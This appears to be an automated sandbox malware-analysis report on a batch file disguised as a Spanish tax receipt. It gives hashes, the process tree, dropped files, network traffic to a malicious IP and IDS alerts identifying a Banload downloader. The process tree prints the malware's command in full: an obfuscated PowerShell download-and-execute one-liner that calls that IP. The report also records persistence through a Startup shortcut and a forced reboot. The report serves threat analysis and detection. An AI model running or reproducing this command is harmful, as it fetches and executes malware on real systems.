File name: | Comprobante_fiscal_Ref-125487.bat |
Full analysis: | https://app.any.run/tasks/982ca7c8-341a-47a6-9016-396ca7500d42 |
Verdict: | Malicious activity |
Analysis date: | May 15, 2019, 17:37:26 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines, with CRLF line terminators |
MD5: | CC71459173670726B3D1EA7CE9D39732 |
SHA1: | B6B8B4B0BA64F7632A9946E088641F4B348EC9E1 |
SHA256: | B4B172EED1FF6A29E06811B259CF36556CA1A472E2BD7B0B19541E06DD7E77F1 |
SSDEEP: | 24:XO+6uSseKXzQc7IFPBAc+LZDDWXmhgpZT:++TE47IFPBAc+LZDDW26T |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2620 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Comprobante_fiscal_Ref-125487.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2760 | C:\Windows\system32\cmd.exe /S /D /c" echo ieX("IeX(New-oBJeCt Net.WebClIeNt).DOwnlOadStRING('http://144.202.68.139/lds25/kk/20938092830482')"); " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2492 | WindowsPowerShell\v1.0\powershell.exe -nop -win 1 - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3572 | "C:\WINDOWS\system32\shutdown.exe" -r -t 200 | C:\WINDOWS\system32\shutdown.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Shutdown and Annotation Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1692 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\System32\SearchProtocolHost.exe | — | SearchIndexer.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Version: 7.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3IULSW28MF3TWQQJKOAG.temp | — | |
MD5:— | SHA256:— | |||
2492 | powershell.exe | C:\Users\Public\Java_pgajdy9_\pp.png | — | |
MD5:— | SHA256:— | |||
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2492 | powershell.exe | C:\users\public\Java_pgajdy9_\Java_pgajdy9_.zip | compressed | |
MD5:91AD5E72E197373753D193E189C07145 | SHA256:27F7C3059FA051DA825EF62599EB9A1889BB71C15EB2C2ED887434C7EFF51363 | |||
2492 | powershell.exe | C:\users\public\c.lnk | lnk | |
MD5:3E3C2575AD74451DEE2B959E1E2338FD | SHA256:C0A4318749233AAC90B8D1D1A2CFF6F5049F7F3CA015A62969437C8CC3A0E9ED | |||
2492 | powershell.exe | C:\users\public\Java_pgajdy9_\Java_pgajdy9_1.LNS | text | |
MD5:BAD58F227E5BECA5D3028897B830B1A2 | SHA256:CA37CDECB15EFEB212FECD651E22329D5779DAAAF9FE177F034D525990186925 | |||
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF11f838.TMP | binary | |
MD5:131DC75F6D4142CA9244945A91A71E8D | SHA256:F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4 | |||
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java_pgajdy9_.lnk | lnk | |
MD5:6A970D08DB189EF10A5FD5909088F5F9 | SHA256:8E1047D4C63DDA73ED881C435B15319E6ABA198AD06226D4F019B01BCD344635 | |||
2492 | powershell.exe | C:\users\public\Java_pgajdy9_\Java_pgajdy9_.LNS | executable | |
MD5:D66208DE7F9C6A6CE07242F96C55EEA8 | SHA256:7C2F4D3DB220CA5FABCC746C0867895ACA39F5E4A0EB0606C82C51CC0C4ECC8C | |||
2492 | powershell.exe | C:\users\public\i.dat | text | |
MD5:313CAEA4BA84A1CAC897FB4BD44148FA | SHA256:97196FC1E13732643483E245BC037A05526F93C1A392237CDAC2048FFBAC7C8F |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2492 | powershell.exe | GET | 200 | 144.202.68.139:80 | http://144.202.68.139/lds25/kk/20938092830482 | US | text | 7.82 Kb | malicious |
2492 | powershell.exe | GET | 200 | 144.202.68.139:80 | http://144.202.68.139/mds25/kk/md.zip | US | compressed | 11.4 Mb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2492 | powershell.exe | 144.202.68.139:80 | — | Baltimore Technology Park, LLC | US | malicious |
PID | Process | Class | Message |
---|---|---|---|
2492 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Downloader.Banload |
2492 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host ZIP Request |